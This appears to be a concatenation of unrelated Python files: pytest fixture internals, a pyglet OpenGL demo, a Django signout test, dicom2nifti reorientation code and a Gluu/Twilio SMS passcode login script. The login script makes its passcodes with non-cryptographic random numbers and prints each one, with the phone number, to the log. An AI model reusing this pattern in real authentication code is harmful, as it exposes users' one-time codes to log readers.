param_index = funcitem.callspec.indices.get(argname, 0)
# if a parametrize invocation set a scope it will override
# the static scope defined with the fixture function
paramscopenum = funcitem.callspec._arg2scopenum.get(argname)
if paramscopenum is not None:
scope = scopes[paramscopenum]
subrequest = SubRequest(self, scope, param, param_index, fixturedef)
# check if a higher-level scoped fixture accesses a lower level one
subrequest._check_scope(argname, self.scope, scope)
# clear sys.exc_info before invoking the fixture (python bug?)
# if its not explicitly cleared it will leak into the call
exc_clear()
try:
# call the fixture function
val = fixturedef.execute(request=subrequest)
finally:
# if fixture function failed it might have registered finalizers
self.session._setupstate.addfinalizer(fixturedef.finish,
subrequest.node)
return val
def _check_scope(self, argname, invoking_scope, requested_scope):
if argname == "request":
return
if scopemismatch(invoking_scope, requested_scope):
# try to report something helpful
lines = self._factorytraceback()
pytest.fail("ScopeMismatch: You tried to access the %r scoped "
"fixture %r with a %r scoped request object, "
"involved factories\n%s" %(
(requested_scope, argname, invoking_scope, "\n".join(lines))),
pytrace=False)
def _factorytraceback(self):
lines = []
for fixturedef in self._get_fixturestack():
factory = fixturedef.func
fs, lineno = getfslineno(factory)
p = self._pyfuncitem.session.fspath.bestrelpath(fs)
args = inspect.formatargspec(*inspect.getargspec(factory))
lines.append("%s:%d: def %s%s" %(
p, lineno, factory.__name__, args))
return lines
def _getscopeitem(self, scope):
if scope == "function":
# this might also be a non-function Item despite its attribute name
return self._pyfuncitem
node = get_scope_node(self._pyfuncitem, scope)
if node is None and scope == "class":
# fallback to function item itself
node = self._pyfuncitem
assert node
return node
def __repr__(self):
return "<FixtureRequest for %r>" %(self.node)
class SubRequest(FixtureRequest):
""" a sub request for handling getting a fixture from a
test function/fixture. """
def __init__(self, request, scope, param, param_index, fixturedef):
self._parent_request = request
self.fixturename = fixturedef.argname
if param is not NOTSET:
self.param = param
self.param_index = param_index
self.scope = scope
self._fixturedef = fixturedef
self.addfinalizer = fixturedef.addfinalizer
self._pyfuncitem = request._pyfuncitem
self._funcargs = request._funcargs
self._fixturedefs = request._fixturedefs
self._arg2fixturedefs = request._arg2fixturedefs
self._arg2index = request._arg2index
self.fixturenames = request.fixturenames
self._fixturemanager = request._fixturemanager
def __repr__(self):
return "<SubRequest %r for %r>" % (self.fixturename, self._pyfuncitem)
class ScopeMismatchError(Exception):
""" A fixture function tries to use a different fixture function which
which has a lower scope (e.g. a Session one calls a function one)
"""
scopes = "session module class function".split()
scopenum_function = scopes.index("function")
def scopemismatch(currentscope, newscope):
return scopes.index(newscope) > scopes.index(currentscope)
class FixtureLookupError(LookupError):
""" could not return a requested Fixture (missing or invalid). """
def __init__(self, argname, request, msg=None):
self.argname = argname
self.request = request
self.fixturestack = request._get_fixturestack()
self.msg = msg
def formatrepr(self):
tblines = []
addline = tblines.append
stack = [self.request._pyfuncitem.obj]
stack.extend(map(lambda x: x.func, self.fixturestack))
msg = self.msg
if msg is not None:
stack = stack[:-1] # the last fixture raise an error, let's present
# it at the requesting side
for function in stack:
fspath, lineno = getfslineno(function)
try:
lines, _ = inspect.getsourcelines(get_real_func(function))
except IOError:
error_msg = "file %s, line %s: source code not available"
addline(error_msg % (fspath, lineno+1))
else:
addline("file %s, line %s" % (fspath, lineno+1))
for i, line in enumerate(lines):
line = line.rstrip()
addline(" " + line)
if line.lstrip().startswith('def'):
break
if msg is None:
fm = self.request._fixturemanager
available = []
for name, fixturedef in fm._arg2fixturedefs.items():
parentid = self.request._pyfuncitem.parent.nodeid
faclist = list(fm._matchfactories(fixturedef, parentid))
if faclist:
available.append(name)
msg = "fixture %r not found" % (self.argname,)
msg += "\n available fixtures: %s" %(", ".join(available),)
msg += "\n use 'py.test --fixtures [testpath]' for help on them."
return FixtureLookupErrorRepr(fspath, lineno, tblines, msg, self.argname)
class FixtureLookupErrorRepr(TerminalRepr):
def __init__(self, filename, firstlineno, tblines, errorstring, argname):
self.tblines = tblines
self.errorstring = errorstring
self.filename = filename
self.firstlineno = firstlineno
self.argname = argname
def toterminal(self, tw):
#tw.line("FixtureLookupError: %s" %(self.argname), red=True)
for tbline in self.tblines:
tw.line(tbline.rstrip())
for line in self.errorstring.split("\n"):
tw.line(" " + line.strip(), red=True)
tw.line()
tw.line("%s:%d" % (self.filename, self.firstlineno+1))
class FixtureManager:
"""
pytest fixtures definitions and information is stored and managed
from this class.
During collection fm.parsefactories() is called multiple times to parse
fixture function definitions into FixtureDef objects and internal
data structures.
During collection of test functions, metafunc-mechanics instantiate
a FuncFixtureInfo object which is cached per node/func-name.
This FuncFixtureInfo object is later retrieved by Function nodes
which themselves offer a fixturenames attribute.
The FuncFixtureInfo object holds information about fixtures and FixtureDefs
relevant for a particular function. An initial list of fixtures is
assembled like this:
- ini-defined usefixtures
- autouse-marked fixtures along the collection chain up from the function
- usefixtures markers at module/class/function level
- test function funcargs
Subsequently the funcfixtureinfo.fixturenames attribute is computed
as the closure of the fixtures needed to setup the initial fixtures,
i. e. fixtures needed by fixture functions themselves are appended
to the fixturenames list.
Upon the test-setup phases all fixturenames are instantiated, retrieved
by a lookup of their FuncFixtureInfo.
"""
_argprefix = "pytest_funcarg__"
FixtureLookupError = FixtureLookupError
FixtureLookupErrorRepr = FixtureLookupErrorRepr
def __init__(self, session):
self.session = session
self.config = session.config
self._arg2fixturedefs = {}
self._holderobjseen = set()
self._arg2finish = {}
self._nodeid_and_autousenames = [("", self.config.getini("usefixtures"))]
session.config.pluginmanager.register(self, "funcmanage")
def getfixtureinfo(self, node, func, cls, funcargs=True):
if funcargs and not hasattr(node, "nofuncargs"):
if cls is not None:
startindex = 1
else:
startindex = None
argnames = getfuncargnames(func, startindex)
else:
argnames = ()
usefixtures = getattr(func, "usefixtures", None)
initialnames = argnames
if usefixtures is not None:
initialnames = usefixtures.args + initialnames
fm = node.session._fixturemanager
names_closure, arg2fixturedefs = fm.getfixtureclosure(initialnames,
node)
return FuncFixtureInfo(argnames, names_closure, arg2fixturedefs)
def pytest_plugin_registered(self, plugin):
nodeid = None
try:
p = py.path.local(plugin.__file__)
except AttributeError:
pass
else:
# construct the base nodeid which is later used to check
# what fixtures are visible for particular tests (as denoted
# by their test id)
if p.basename.startswith("conftest.py"):
nodeid = p.dirpath().relto(self.config.rootdir)
if p.sep != "/":
nodeid = nodeid.replace(p.sep, "/")
self.parsefactories(plugin, nodeid)
def _getautousenames(self, nodeid):
""" return a tuple of fixture names to be used. """
autousenames = []
for baseid, basenames in self._nodeid_and_autousenames:
if nodeid.startswith(baseid):
if baseid:
i = len(baseid)
nextchar = nodeid[i:i+1]
if nextchar and nextchar not in ":/":
continue
autousenames.extend(basenames)
# make sure autousenames are sorted by scope, scopenum 0 is session
autousenames.sort(
key=lambda x: self._arg2fixturedefs[x][-1].scopenum)
return autousenames
def getfixtureclosure(self, fixturenames, parentnode):
# collect the closure of all fixtures , starting with the given
# fixturenames as the initial set. As we have to visit all
# factory definitions anyway, we also return a arg2fixturedefs
# mapping so that the caller can reuse it and does not have
# to re-discover fixturedefs again for each fixturename
# (discovering matching fixtures for a given name/node is expensive)
parentid = parentnode.nodeid
fixturenames_closure = self._getautousenames(parentid)
def merge(otherlist):
for arg in otherlist:
if arg not in fixturenames_closure:
fixturenames_closure.append(arg)
merge(fixturenames)
arg2fixturedefs = {}
lastlen = -1
while lastlen != len(fixturenames_closure):
lastlen = len(fixturenames_closure)
for argname in fixturenames_closure:
if argname in arg2fixturedefs:
continue
fixturedefs = self.getfixturedefs(argname, parentid)
if fixturedefs:
arg2fixturedefs[argname] = fixturedefs
merge(fixturedefs[-1].argnames)
return fixturenames_closure, arg2fixturedefs
def pytest_generate_tests(self, metafunc):
for argname in metafunc.fixturenames:
faclist = metafunc._arg2fixturedefs.get(argname)
if faclist:
fixturedef = faclist[-1]
if fixturedef.params is not None:
func_params = getattr(getattr(metafunc.function, 'parametrize', None), 'args', [[None]])
# skip directly parametrized arguments
if argname not in func_params:
metafunc.parametrize(argname, fixturedef.params,
indirect=True, scope=fixturedef.scope,
ids=fixturedef.ids)
else:
continue # will raise FixtureLookupError at setup time
def pytest_collection_modifyitems(self, items):
# separate parametrized setups
items[:] = reorder_items(items)
def parsefactories(self, node_or_obj, nodeid=NOTSET, unittest=False):
if nodeid is not NOTSET:
holderobj = node_or_obj
else:
holderobj = node_or_obj.obj
nodeid = node_or_obj.nodeid
if holderobj in self._holderobjseen:
return
self._holderobjseen.add(holderobj)
autousenames = []
for name in dir(holderobj):
obj = getattr(holderobj, name, None)
if not callable(obj):
continue
# fixture functions have a pytest_funcarg__ prefix (pre-2.3 style)
# or are "@pytest.fixture" marked
marker = getfixturemarker(obj)
if marker is None:
if not name.startswith(self._argprefix):
continue
marker = defaultfuncargprefixmarker
name = name[len(self._argprefix):]
elif not isinstance(marker, FixtureFunctionMarker):
# magic globals with __getattr__ might have got us a wrong
# fixture attribute
continue
else:
assert not name.startswith(self._argprefix)
fixturedef = FixtureDef(self, nodeid, name, obj,
marker.scope, marker.params,
yieldctx=marker.yieldctx,
unittest=unittest, ids=marker.ids)
faclist = self._arg2fixturedefs.setdefault(name, [])
if fixturedef.has_location:
faclist.append(fixturedef)
else:
# fixturedefs with no location are at the front
# so this inserts the current fixturedef after the
# existing fixturedefs from external plugins but
# before the fixturedefs provided in conftests.
i = len([f for f in faclist if not f.has_location])
faclist.insert(i, fixturedef)
if marker.autouse:
autousenames.append(name)
if autousenames:
self._nodeid_and_autousenames.append((nodeid or '', autousenames))
def getfixturedefs(self, argname, nodeid):
try:
fixturedefs = self._arg2fixturedefs[argname]
except KeyError:
return None
else:
return tuple(self._matchfactories(fixturedefs, nodeid))
def _matchfactories(self, fixturedefs, nodeid):
for fixturedef in fixturedefs:
if nodeid.startswith(fixturedef.baseid):
yield fixturedef
def fail_fixturefunc(fixturefunc, msg):
fs, lineno = getfslineno(fixturefunc)
location = "%s:%s" % (fs, lineno+1)
source = py.code.Source(fixturefunc)
pytest.fail(msg + ":\n\n" + str(source.indent()) + "\n" + location,
pytrace=False)
def call_fixture_func(fixturefunc, request, kwargs, yieldctx):
if yieldctx:
if not is_generator(fixturefunc):
fail_fixturefunc(fixturefunc,
msg="yield_fixture requires yield statement in function")
iter = fixturefunc(**kwargs)
next = getattr(iter, "__next__", None)
if next is None:
next = getattr(iter, "next")
res = next()
def teardown():
try:
next()
except StopIteration:
pass
else:
fail_fixturefunc(fixturefunc,
"yield_fixture function has more than one 'yield'")
request.addfinalizer(teardown)
else:
if is_generator(fixturefunc):
fail_fixturefunc(fixturefunc,
msg="pytest.fixture functions cannot use ``yield``. "
"Instead write and return an inner function/generator "
"and let the consumer call and iterate over it.")
res = fixturefunc(**kwargs)
return res
class FixtureDef:
""" A container for a factory definition. """
def __init__(self, fixturemanager, baseid, argname, func, scope, params,
yieldctx, unittest=False, ids=None):
self._fixturemanager = fixturemanager
self.baseid = baseid or ''
self.has_location = baseid is not None
self.func = func
self.argname = argname
self.scope = scope
self.scopenum = scopes.index(scope or "function")
self.params = params
startindex = unittest and 1 or None
self.argnames = getfuncargnames(func, startindex=startindex)
self.yieldctx = yieldctx
self.unittest = unittest
self.ids = ids
self._finalizer = []
def addfinalizer(self, finalizer):
self._finalizer.append(finalizer)
def finish(self):
try:
while self._finalizer:
func = self._finalizer.pop()
func()
finally:
# even if finalization fails, we invalidate
# the cached fixture value
if hasattr(self, "cached_result"):
del self.cached_result
def execute(self, request):
# get required arguments and register our own finish()
# with their finalization
kwargs = {}
for argname in self.argnames:
fixturedef = request._get_active_fixturedef(argname)
result, arg_cache_key, exc = fixturedef.cached_result
request._check_scope(argname, request.scope, fixturedef.scope)
kwargs[argname] = result
if argname != "request":
fixturedef.addfinalizer(self.finish)
my_cache_key = request.param_index
cached_result = getattr(self, "cached_result", None)
if cached_result is not None:
result, cache_key, err = cached_result
if my_cache_key == cache_key:
if err is not None:
py.builtin._reraise(*err)
else:
return result
# we have a previous but differently parametrized fixture instance
# so we need to tear it down before creating a new one
self.finish()
assert not hasattr(self, "cached_result")
fixturefunc = self.func
if self.unittest:
if request.instance is not None:
# bind the unbound method to the TestCase instance
fixturefunc = self.func.__get__(request.instance)
else:
# the fixture function needs to be bound to the actual
# request.instance so that code working with "self" behaves
# as expected.
if request.instance is not None:
fixturefunc = getimfunc(self.func)
if fixturefunc != self.func:
fixturefunc = fixturefunc.__get__(request.instance)
try:
result = call_fixture_func(fixturefunc, request, kwargs,
self.yieldctx)
except Exception:
self.cached_result = (None, my_cache_key, sys.exc_info())
raise
self.cached_result = (result, my_cache_key, None)
return result
def __repr__(self):
return ("<FixtureDef name=%r scope=%r baseid=%r >" %
(self.argname, self.scope, self.baseid))
def num_mock_patch_args(function):
""" return number of arguments used up by mock arguments (if any) """
patchings = getattr(function, "patchings", None)
if not patchings:
return 0
mock = sys.modules.get("mock", sys.modules.get("unittest.mock", None))
if mock is not None:
return len([p for p in patchings
if not p.attribute_name and p.new is mock.DEFAULT])
return len(patchings)
def getfuncargnames(function, startindex=None):
# XXX merge with main.py's varnames
#assert not inspect.isclass(function)
realfunction = function
while hasattr(realfunction, "__wrapped__"):
realfunction = realfunction.__wrapped__
if startindex is None:
startindex = inspect.ismethod(function) and 1 or 0
if realfunction != function:
startindex += num_mock_patch_args(function)
function = realfunction
if isinstance(function, functools.partial):
argnames = inspect.getargs(py.code.getrawcode(function.func))[0]
partial = function
argnames = argnames[len(partial.args):]
if partial.keywords:
for kw in partial.keywords:
argnames.remove(kw)
else:
argnames = inspect.getargs(py.code.getrawcode(function))[0]
defaults = getattr(function, 'func_defaults',
getattr(function, '__defaults__', None)) or ()
numdefaults = len(defaults)
if numdefaults:
return tuple(argnames[startindex:-numdefaults])
return tuple(argnames[startindex:])
def reorder_items(items):
argkeys_cache = {}
for scopenum in range(0, scopenum_function):
argkeys_cache[scopenum] = d = {}
for item in items:
keys = set(get_parametrized_fixture_keys(item, scopenum))
if keys:
d[item] = keys
return reorder_items_atscope(items, set(), argkeys_cache, 0)
def reorder_items_atscope(items, ignore, argkeys_cache, scopenum):
if scopenum >= scopenum_function or len(items) < 3:
return items
items_done = []
while 1:
items_before, items_same, items_other, newignore = \
slice_items(items, ignore, argkeys_cache[scopenum])
items_before = reorder_items_atscope(
items_before, ignore, argkeys_cache,scopenum+1)
if items_same is None:
# nothing to reorder in this scope
assert items_other is None
return items_done + items_before
items_done.extend(items_before)
items = items_same + items_other
ignore = newignore
def slice_items(items, ignore, scoped_argkeys_cache):
# we pick the first item which uses a fixture instance in the
# requested scope and which we haven't seen yet. We slice the input
# items list into a list of items_nomatch, items_same and
# items_other
if scoped_argkeys_cache: # do we need to do work at all?
it = iter(items)
# first find a slicing key
for i, item in enumerate(it):
argkeys = scoped_argkeys_cache.get(item)
if argkeys is not None:
argkeys = argkeys.difference(ignore)
if argkeys: # found a slicing key
slicing_argkey = argkeys.pop()
items_before = items[:i]
items_same = [item]
items_other = []
# now slice the remainder of the list
for item in it:
argkeys = scoped_argkeys_cache.get(item)
if argkeys and slicing_argkey in argkeys and \
slicing_argkey not in ignore:
items_same.append(item)
else:
items_other.append(item)
newignore = ignore.copy()
newignore.add(slicing_argkey)
return (items_before, items_same, items_other, newignore)
return items, None, None, None
def get_parametrized_fixture_keys(item, scopenum):
""" return list of keys for all parametrized arguments which match
the specified scope. """
assert scopenum < scopenum_function # function
try:
cs = item.callspec
except AttributeError:
pass
else:
# cs.indictes.items() is random order of argnames but
# then again different functions (items) can change order of
# arguments so it doesn't matter much probably
for argname, param_index in cs.indices.items():
if cs._arg2scopenum[argname] != scopenum:
continue
if scopenum == 0: # session
key = (argname, param_index)
elif scopenum == 1: # module
key = (argname, param_index, item.fspath)
elif scopenum == 2: # class
key = (argname, param_index, item.fspath, item.cls)
yield key
def xunitsetup(obj, name):
meth = getattr(obj, name, None)
if getfixturemarker(meth) is None:
return meth
def getfixturemarker(obj):
""" return fixturemarker or None if it doesn't exist or raised
exceptions."""
try:
return getattr(obj, "_pytestfixturefunction", None)
except KeyboardInterrupt:
raise
except Exception:
# some objects raise errors like request (from flask import request)
# we don't expect them to be fixture functions
return None
scopename2class = {
'class': Class,
'module': Module,
'function': pytest.Item,
}
def get_scope_node(node, scope):
cls = scopename2class.get(scope)
if cls is None:
if scope == "session":
return node.session
raise ValueError("unknown scope")
return node.getparent(cls)
|
"""
This example uses OpenGL via Pyglet and draws
a bunch of rectangles on the screen.
"""
import random
import time
import pyglet.gl as GL
import pyglet
import ctypes
SCREEN_WIDTH = 700
SCREEN_HEIGHT = 500
RECT_WIDTH = 50
RECT_HEIGHT = 50
class Shape():
def __init__(self):
self.x = 0
self.y = 0
class VertexBuffer():
""" Class to hold vertex buffer info. """
def __init__(self, vbo_id, size):
self.vbo_id = vbo_id
self.size = size
def add_rect(rect_list, x, y, width, height, color):
""" Create a vertex buffer for a rectangle. """
rect_list.extend([-width / 2, -height / 2,
width / 2, -height / 2,
width / 2, height / 2,
-width / 2, height / 2])
def create_vbo_for_rects(v2f):
vbo_id = GL.GLuint()
GL.glGenBuffers(1, ctypes.pointer(vbo_id))
data2 = (GL.GLfloat*len(v2f))(*v2f)
GL.glBindBuffer(GL.GL_ARRAY_BUFFER, vbo_id)
GL.glBufferData(GL.GL_ARRAY_BUFFER, ctypes.sizeof(data2), data2,
GL.GL_STATIC_DRAW)
shape = VertexBuffer(vbo_id, len(v2f)//2)
return shape
def render_rect_filled(shape, x, y):
""" Render the shape at the right spot. """
# Set color
GL.glDisable(GL.GL_BLEND)
GL.glColor4ub(shape.color[0], shape.color[1], shape.color[2], 255)
GL.glBindBuffer(GL.GL_ARRAY_BUFFER, shape.vbo_id)
GL.glVertexPointer(2, GL.GL_FLOAT, 0, 0)
GL.glLoadIdentity()
GL.glTranslatef(x + shape.width / 2, y + shape.height / 2, 0)
GL.glDrawArrays(GL.GL_QUADS, 0, shape.size)
class MyApplication():
""" Main application class. """
def setup(self):
""" Set up the game and initialize the variables. """
# Set background to white
GL.glClearColor(1, 1, 1, 1)
self.rect_list = []
self.shape_list = []
for i in range(2000):
x = random.randrange(0, SCREEN_WIDTH)
y = random.randrange(0, SCREEN_HEIGHT)
width = random.randrange(20, 71)
height = random.randrange(20, 71)
d_x = random.randrange(-3, 4)
d_y = random.randrange(-3, 4)
red = random.randrange(256)
blue = random.randrange(256)
green = random.randrange(256)
alpha = random.randrange(256)
color = (red, blue, green, alpha)
shape = Shape()
shape.x = x
shape.y = y
self.shape_list.append(shape)
add_rect(self.rect_list, 0, 0, width, height, color)
print("Creating vbo for {} vertices.".format(len(self.rect_list) // 2))
self.rect_vbo = create_vbo_for_rects(self.rect_list)
print("VBO {}".format(self.rect_vbo.vbo_id))
def animate(self, dt):
""" Move everything """
pass
def on_draw(self):
"""
Render the screen.
"""
start = time.time()
float_size = ctypes.sizeof(ctypes.c_float)
record_len = 10 * float_size
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glMatrixMode(GL.GL_MODELVIEW)
GL.glEnableClientState(GL.GL_VERTEX_ARRAY)
GL.glColor4ub(255, 0, 0, 255)
GL.glBindBuffer(GL.GL_ARRAY_BUFFER, self.rect_vbo.vbo_id)
GL.glVertexPointer(2, GL.GL_FLOAT, record_len, 0)
for i in range(len(self.shape_list)):
shape = self.shape_list[i]
GL.glLoadIdentity()
GL.glTranslatef(shape.x, shape.y, 0)
GL.glDrawArrays(GL.GL_QUADS, i * 8, 8)
# GL.glDrawArrays(GL.GL_QUADS,
# 0,
# self.rect_vbo.size)
elapsed = time.time() - start
print(elapsed)
def main():
window = pyglet.window.Window(SCREEN_WIDTH, SCREEN_HEIGHT)
app = MyApplication()
app.setup()
pyglet.clock.schedule_interval(app.animate, 1/60)
@window.event
def on_draw():
window.clear()
app.on_draw()
pyglet.app.run()
main()
|
import mock
from django.test import TestCase
from mediaviewer.views.signout import signout
class TestSignout(TestCase):
def setUp(self):
self.logout_patcher = mock.patch('mediaviewer.views.signout.logout')
self.mock_logout = self.logout_patcher.start()
self.addCleanup(self.logout_patcher.stop)
self.setSiteWideContext_patcher = mock.patch(
'mediaviewer.views.signout.setSiteWideContext')
self.mock_setSiteWideContext = self.setSiteWideContext_patcher.start()
self.addCleanup(self.setSiteWideContext_patcher.stop)
self.render_patcher = mock.patch('mediaviewer.views.signout.render')
self.mock_render = self.render_patcher.start()
self.addCleanup(self.render_patcher.stop)
self.request = mock.MagicMock()
def test_signout(self):
expected_context = {'active_page': 'logout',
'loggedin': False,
'title': 'Signed out'}
expected = self.mock_render.return_value
actual = signout(self.request)
self.assertEqual(expected, actual)
self.mock_logout.assert_called_once_with(self.request)
self.mock_setSiteWideContext.assert_called_once_with(
expected_context, self.request)
self.mock_render.assert_called_once_with(
self.request,
'mediaviewer/logout.html',
expected_context)
|
"""
Created on Thu Aug 1 16:10:56 2013
@author: vterzopoulos, abrys
"""
import nibabel
import numpy
from dicom2nifti.image_volume import load, SliceType, ImageVolume
def reorient_image(input_image, output_image):
"""
Change the orientation of the Image data in order to be in LAS space
x will represent the coronal plane, y the sagittal and z the axial plane.
x increases from Right (R) to Left (L), y from Posterior (P) to Anterior (A) and z from Inferior (I) to Superior (S)
:returns: The output image in nibabel form
:param output_image: filepath to the nibabel image
:param input_image: filepath to the nibabel image
"""
# Use the imageVolume module to find which coordinate corresponds to each plane
# and get the image data in RAS orientation
# print 'Reading nifti'
if isinstance(input_image, nibabel.Nifti1Image):
image = ImageVolume(input_image)
else:
image = load(input_image)
# 4d have a different conversion to 3d
# print 'Reorganizing data'
if image.nifti_data.squeeze().ndim == 4:
new_image = _reorient_4d(image)
elif image.nifti_data.squeeze().ndim == 3 or image.nifti_data.ndim == 3 or image.nifti_data.squeeze().ndim == 2:
new_image = _reorient_3d(image)
else:
raise Exception('Only 3d and 4d images are supported')
# print 'Recreating affine'
affine = image.nifti.affine
# Based on VolumeImage.py where slice orientation 1 represents the axial plane
# Flipping on the data may be needed based on x_inverted, y_inverted, ZInverted
# Create new affine header by changing the order of the columns of the input image header
# the last column with the origin depends on the origin of the original image, the size and the direction of x,y,z
new_affine = numpy.eye(4)
new_affine[:, 0] = affine[:, image.sagittal_orientation.normal_component]
new_affine[:, 1] = affine[:, image.coronal_orientation.normal_component]
new_affine[:, 2] = affine[:, image.axial_orientation.normal_component]
point = [0, 0, 0, 1]
# If the orientation of coordinates is inverted, then the origin of the "new" image
# would correspond to the last voxel of the original image
# First we need to find which point is the origin point in image coordinates
# and then transform it in world coordinates
if not image.axial_orientation.x_inverted:
new_affine[:, 0] = - new_affine[:, 0]
point[image.sagittal_orientation.normal_component] = image.dimensions[
image.sagittal_orientation.normal_component] - 1
# new_affine[0, 3] = - new_affine[0, 3]
if image.axial_orientation.y_inverted:
new_affine[:, 1] = - new_affine[:, 1]
point[image.coronal_orientation.normal_component] = image.dimensions[
image.coronal_orientation.normal_component] - 1
# new_affine[1, 3] = - new_affine[1, 3]
if image.coronal_orientation.y_inverted:
new_affine[:, 2] = - new_affine[:, 2]
point[image.axial_orientation.normal_component] = image.dimensions[image.axial_orientation.normal_component] - 1
# new_affine[2, 3] = - new_affine[2, 3]
new_affine[:, 3] = numpy.dot(affine, point)
# DONE: Needs to update new_affine, so that there is no translation difference between the original
# and created image (now there is 1-2 voxels translation)
# print 'Creating new nifti image'
if new_image.ndim > 3: # do not squeeze single slice data
new_image = new_image.squeeze()
output = nibabel.nifti1.Nifti1Image(new_image, new_affine)
output.header.set_slope_inter(1, 0)
output.header.set_xyzt_units(2) # set units for xyz (leave t as unknown)
output.to_filename(output_image)
return output
def _reorient_4d(image):
"""
Reorganize the data for a 4d nifti
"""
# print 'converting 4d image'
# Create empty array where x,y,z correspond to LR (sagittal), PA (coronal), IS (axial) directions and the size
# of the array in each direction is the same with the corresponding direction of the input image.
new_image = numpy.zeros([image.dimensions[image.sagittal_orientation.normal_component],
image.dimensions[image.coronal_orientation.normal_component],
image.dimensions[image.axial_orientation.normal_component],
image.dimensions[3]],
dtype=image.nifti_data.dtype)
# loop over all timepoints
for timepoint in range(0, image.dimensions[3]):
# Fill the new image with the values of the input image but with mathicng the orientation with x,y,z
if image.coronal_orientation.y_inverted:
for i in range(new_image.shape[2]):
new_image[:, :, i, timepoint] = numpy.fliplr(numpy.squeeze(image.get_slice(SliceType.AXIAL,
new_image.shape[2] - 1 - i,
timepoint).original_data))
else:
for i in range(new_image.shape[2]):
new_image[:, :, i, timepoint] = numpy.fliplr(numpy.squeeze(image.get_slice(SliceType.AXIAL,
i, timepoint).original_data))
return new_image
def _reorient_3d(image):
"""
Reorganize the data for a 3d nifti
"""
# Create empty array where x,y,z correspond to LR (sagittal), PA (coronal), IS (axial) directions and the size
# of the array in each direction is the same with the corresponding direction of the input image.
new_image = numpy.zeros([image.dimensions[image.sagittal_orientation.normal_component],
image.dimensions[image.coronal_orientation.normal_component],
image.dimensions[image.axial_orientation.normal_component]],
dtype=image.nifti_data.dtype)
# Fill the new image with the values of the input image but with matching the orientation with x,y,z
if image.coronal_orientation.y_inverted:
for i in range(new_image.shape[2]):
new_image[:, :, i] = numpy.fliplr(image.get_slice(SliceType.AXIAL,
new_image.shape[2] - 1 - i).original_data)
else:
for i in range(new_image.shape[2]):
new_image[:, :, i] = numpy.fliplr(image.get_slice(SliceType.AXIAL,
i).original_data)
return new_image
|
from java.util import Arrays
from javax.faces.application import FacesMessage
from org.gluu.jsf2.message import FacesMessages
from org.gluu.oxauth.security import Identity
from org.gluu.oxauth.service import UserService, AuthenticationService
from org.gluu.oxauth.util import ServerUtil
from org.gluu.model.custom.script.type.auth import PersonAuthenticationType
from org.gluu.service.cdi.util import CdiUtil
from org.gluu.util import StringHelper, ArrayHelper
from com.google.common.base import Joiner
from com.twilio import Twilio
import com.twilio.rest.api.v2010.account.Message as TwMessage
from com.twilio.type import PhoneNumber
import random
import sys
class PersonAuthentication(PersonAuthenticationType):
def __init__(self, currentTimeMillis):
self.currentTimeMillis = currentTimeMillis
def init(self, customScript, configurationAttributes):
print "Twilio SMS. Initialized"
return True
def destroy(self, configurationAttributes):
print "Twilio SMS. Destroyed successfully"
return True
def getApiVersion(self):
return 11
def getAuthenticationMethodClaims(self, configurationAttributes):
return None
def isValidAuthenticationMethod(self, usageType, configurationAttributes):
return True
def getAlternativeAuthenticationMethod(self, usageType, configurationAttributes):
return None
def authenticate(self, configurationAttributes, requestParameters, step):
print "TwilioSMS. Authenticate for Step %s" % str(step)
identity = CdiUtil.bean(Identity)
authenticationService = CdiUtil.bean(AuthenticationService)
user = authenticationService.getAuthenticatedUser()
if step == 1:
if user == None:
credentials = identity.getCredentials()
user_name = credentials.getUsername()
user_password = credentials.getPassword()
if StringHelper.isNotEmptyString(user_name) and StringHelper.isNotEmptyString(user_password):
authenticationService.authenticate(user_name, user_password)
user = authenticationService.getAuthenticatedUser()
if user == None:
return False
#Attempt to send message now if user has only one mobile number
mobiles = user.getAttributeValues("mobile")
if mobiles == None:
return False
else:
code = random.randint(100000, 999999)
identity.setWorkingParameter("randCode", code)
sid = configurationAttributes.get("twilio_sid").getValue2()
token = configurationAttributes.get("twilio_token").getValue2()
self.from_no = configurationAttributes.get("from_number").getValue2()
Twilio.init(sid, token)
if mobiles.size() == 1:
self.sendMessage(code, mobiles.get(0))
else:
chopped = ""
for numb in mobiles:
l = len(numb)
chopped += "," + numb[max(0, l-4) : l]
#converting to comma-separated list (identity does not remember lists in 3.1.3)
identity.setWorkingParameter("numbers", Joiner.on(",").join(mobiles.toArray()))
identity.setWorkingParameter("choppedNos", chopped[1:])
return True
else:
if user == None:
return False
session_attributes = identity.getSessionId().getSessionAttributes()
code = session_attributes.get("randCode")
numbers = session_attributes.get("numbers")
if step == 2 and numbers != None:
#Means the selection number page was used
idx = ServerUtil.getFirstValue(requestParameters, "OtpSmsloginForm:indexOfNumber")
if idx != None and code != None:
sendToNumber = numbers.split(",")[int(idx)]
self.sendMessage(code, sendToNumber)
return True
else:
return False
success = False
form_passcode = ServerUtil.getFirstValue(requestParameters, "OtpSmsloginForm:passcode")
if form_passcode != None and code == form_passcode:
print "TwilioSMS. authenticate. 6-digit code matches with code sent via SMS"
success = True
else:
facesMessages = CdiUtil.bean(FacesMessages)
facesMessages.setKeepMessages()
facesMessages.clear()
facesMessages.add(FacesMessage.SEVERITY_ERROR, "Wrong code entered")
return success
def prepareForStep(self, configurationAttributes, requestParameters, step):
print "TwilioSMS. Prepare for Step %s" % str(step)
return True
def getExtraParametersForStep(self, configurationAttributes, step):
if step > 1:
return Arrays.asList("randCode", "numbers", "choppedNos")
return None
def getCountAuthenticationSteps(self, configurationAttributes):
print "TwilioSMS. getCountAuthenticationSteps called"
if CdiUtil.bean(Identity).getWorkingParameter("numbers") == None:
return 2
else:
return 3
def getPageForStep(self, configurationAttributes, step):
print "TwilioSMS. getPageForStep called %s" % step
print "numbers are %s" % CdiUtil.bean(Identity).getWorkingParameter("numbers")
defPage = "/casa/otp_sms.xhtml"
if step == 2:
if CdiUtil.bean(Identity).getWorkingParameter("numbers") == None:
return defPage
else:
return "/casa/otp_sms_prompt.xhtml"
elif step == 3:
return defPage
return ""
def logout(self, configurationAttributes, requestParameters):
return True
def hasEnrollments(self, configurationAttributes, user):
return user.getAttribute("mobile") != None
def sendMessage(self, code, numb):
try:
if numb[:1] != "+":
numb = "+" + numb
print "TwilioSMS. Sending SMS message (%s) to %s" % (code, numb)
msg = "%s is your passcode to access your account" % code
message = TwMessage.creator(PhoneNumber(numb), PhoneNumber(self.from_no), msg).create()
print "TwilioSMS. Message Sid: %s" % message.getSid()
except:
print "TwilioSMS. Error sending message", sys.exc_info()[1]
|
from db_utils import deleteLinksByHost
from db_utils import deleteHost
from db_utils import addNewHost
from db_utils import getAllHosts
from error_message import showErrorPage
